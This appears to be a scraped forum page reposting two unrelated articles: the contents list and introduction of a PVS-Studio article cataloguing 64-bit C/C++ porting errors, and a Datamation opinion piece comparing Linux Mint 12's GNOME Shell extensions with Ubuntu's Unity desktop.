[h=1]A Collection of Examples of 64-bit Errors in Real Programs[/h] Abstract Introduction Example 1. Buffer overflow Example 2. Unnecessary type conversions Example 3. Incorrect #ifdef's Example 4. Confusion of int and int* Example 5. Using deprecated (obsolete) functions Example 6. Truncation of values at an implicit type conversion Example 7. Undefined functions in C Example 8. Remains of dinosaurs in large and old programs Example 9. Virtual functions Example 10. Magic constants as parameters Example 11. Magic constants denoting size Example 12. Stack overflow Example 13. A function with a variable number of arguments and buffer overflow Example 14. A function with a variable number of arguments and wrong format Example 15. Storing integer values in double Example 16. Address arithmetic. A + B != A - (- Example 17. Address arithmetic. Signed and unsigned types. Example 18. Address arithmetic. Overflows. Example 19. Changing an array's type Example 20. Wrapping a pointer in a 32-bit type Example 21. Memsize-types in unions Example 22. An infinity loop Example 23. Bit operations and NOT operation Example 24. Bit operations, offsets Example 25. Bit operations and sign extension Example 26. Serialization and data exchange Example 27. Changes in type alignment Example 28. Type alignments and why you mustn't write sizeof(x) + sizeof(y) Example 29. Overloaded functions Example 30. Errors in 32-bit units working in WoW64 Summary References [h=2]Abstract[/h] This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++, however, it will be useful for other programmers as well. [h=2]Introduction[/h] Our company OOO "Program Verification Systems" develops a special static analyzer Viva64 that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources: Lessons on development of 64-bit C/C++ applications [1]; About size_t and ptrdiff_t [2]; 20 issues of porting C++ code on the 64-bit platform [3]; PVS-Studio Tutorial [4]; A 64-bit horse that can count [5]. You may also try the demo version of the PVS-Studio tool that includes the Viva64 static code analyzer which detects almost all the errors described in this article. The demo version of the tool can be downloaded here: http://www.viva64.com/pvs-studio/download/. Online: http://www.viva64.com/en/a/0065/print/

[h=1]Is Linux Mint an Ubuntu-Killer?[/h] User traffic and key design changes suggest that Mint is a serious challenger to the King of Linux. Suddenly, everyone's talking about Linux Mint. A six-year-old distribution based on Ubuntu and Debian, Linux Mint has always enjoyed considerable popularity, but, in the last month, it has started receiving dramatically more attention. This attention has two main reasons. First, pundits have been debating the meaning (if any) of the fact that Linux Mint has received over two and a half times more page views than Ubuntu on Distrowatch for the past month. Second, Linux Mint's new 12.0 release, codenamed "Lisa," features the Mint GNOME Shell Extensions (MGSE), a set of modifications that offer alternatives to the most obvious cosmetic and conceptual changes in the GNOME 3 release series. MGSE offers a desktop much like the GNOME 2 series while preserving the most useful of GNOME 3's innovations. This development is so bizarre that it could only make sense in the free and open source software community. Still, the combination of possible new popularity and MGSE is enough to start the community speculating whether Ubuntu users, discontent with the new Unity shell, are looking to Linux Mint as a replacement. At first glance, the idea is absurd. Given that MGSE modifies the GNOME 3.2 release, you might convincingly speculate that Linux Mint has provided the solution for the many who are unhappy with GNOME's current directions. But challenge Ubuntu? Canonical, Ubuntu's commercial arm, claims twenty million users, and is promoting the distribution heavily. By contrast, Linux Mint is a much smaller, non-commercial organization that appears to be less organized, and to have fewer resources to draw upon. In fact, it relies on donations and ingenuity for funding. Yet is the idea even technically possible? Certainly Linux Mint's team and its supporters think so, considering that for several years they have been calling Linux Mint the fourth most widely used operating system, which sounds like a deliberate challenge to Ubuntu's claim to be the third. One way or the other, a closer look seems in order. Although Linux Mint offers a Debian-based edition, the majority of its releases are based on Ubuntu. Nor, so far, is the new release an exception. On the one hand, Linux Mint and Ubuntu share the same installer and boot in more or less the same time on the same machine. They share, too, the same array of GNOME-based software, down to Ubuntu 11.10's replacement of Evolution with Mozilla Thunderbird for email. Both offer fallback environments for systems without 3-D hardware acceleration, and proprietary drivers for video and wLinux Mint and MGSE vs. Ubuntu and Unityireless cards. Linux Mint 12 even introduces a new music player indicator reminiscent of Unity's. Neither includes provision for applets on the panel or application launchers on the desktop, the way that their mutual ancestor GNOME 2 did, although both do support folder and document desktop launchers. On the other hand, most of the differences are minimal. The package managers differ only in their branding, with Linux Mint's being less blaring and obtrusive, as usually happens with a community-based distribution. Admittedly, Linux Mint's system requirements list 500 megabytes of RAM compared to Ubuntu's 384. I suspect, though, that Linux Mint is simply being more realistic about how much memory is needed to do normal productivity without being completely frustrated. [h=4]MGSE vs. Unity[/h] So far as applications are concerned, the greatest difference is that Linux Mint defaults to the little-known DuckDuckGo search engine, whose advertising revenue Linux Mint shares. This is the closest that Linux Mint comes to matching Unity's extensive branding, but the exception is worthwhile. DuckDuckGo offers more options, greater privacy, and noticeably different search results than Google's, and needs only image searching to be a complete replacement. However, the greatest differences between Ubuntu and Linux Mint are in the user experience. After all, Unity is a simplification of the desktop inspired by the interfaces of mobile devices, while Linux Mint is a fusion of GNOME 2 and 3. This fusion is accomplished by adding MGSE options to the Shell Extensions tab for GNOME Tweak, which an increasing number of users consider an essential addition to GNOME 3. MGSE includes extensions to restore many of the features of GNOME 2 while converting GNOME 3 innovations such as the overview mode to options rather than unavoidable necessities. When toggled on, each extension takes effect immediately, allowing you to evaluate them without delay. For many, the most important of MGSE's innovations will probably be the bottom panel, its menu and its notification tray. Together, these extensions are enough to allow users to work on a single screen, instead of constantly switching to the overview mode to open applications or switch virtual workspaces, as GNOME 3 requires. These innovations do not fully restore GNOME 2 functionality, since the panel is not customizable, but they might minimally satisfy those discontented with Unity or GNOME 3. The menu included with Linux Mint 12 is reminiscent of openSUSE's Slab or KDE's Lancelot. It is less obtrusive than both GNOME 2's classical menu and the screen overlay that replaces the menu in Unity. The notification tray is a similar combination of the traditional and the innovative, invisible until toggled by the icon on the far right of the bottom panel, and as long as the bottom panel itself. This arrangement eliminates the usual problem of some of the tray being invisible, making it an improvement over both GNOME and Unity. Yet what is just as important as the extensions themselves is the fact they partially restore the most important feature that Unity often removes or limits: the freedom to work the way you want. In Linux Mint, you can, for instance, work with the bottom panel menu, or go to the GNOME 3 overview to open applications. Similarly, you can work with three virtual workspaces that are part of the panel, enabling the GNOME 3 overview mode to allow the shell to manage virtual workspaces, or use both at once. Although this range of choice needs to be extended before it can match the flexibility of GNOME 2, it is far more than anything provided by Unity, which generally imposes a single way to work on all users, regardless of their preferences. [h=4]Going Down the Road[/h] For those who already use Linux, the trend of Linux Mint is promising. MGSE in particular suggests that Linux Mint is in tune with the existing user base, a group that seems to value the ability to work in their preferred style more than any other factor. At the same time, I suspect that many existing users may feel that Linux Mint does not go far enough in its tendencies. While many will find it an improvement over Ubuntu with Unity, the improvement may not be great enough to be worth the effort of switching distributions. I wonder, too, whether the same qualities that might endear Linux Mint to existing users -- or, at least, make it the lesser of several evils -- will appeal equally to the new users that Unity seems calculated to attract. So far as the Distrowatch figures have meaning, they may reflect only the curiosity of existing users. For now, the most that can be said is that Linux Mint seems to be heading for a destination of which many existing users approve. Unfortunately, in the current release, it has moved part ways down the road but still has a ways to travel. To me, the important question is whether it can arrive before community interest shifts. Also (the question nobody is asking in the focus on Ubuntu) will GNOME or other distributions seize on MGSE as a graceful way of recovering from the embarrassing reception of GNOME 3? Sursa: Is Linux Mint an Ubuntu-Killer? - Datamation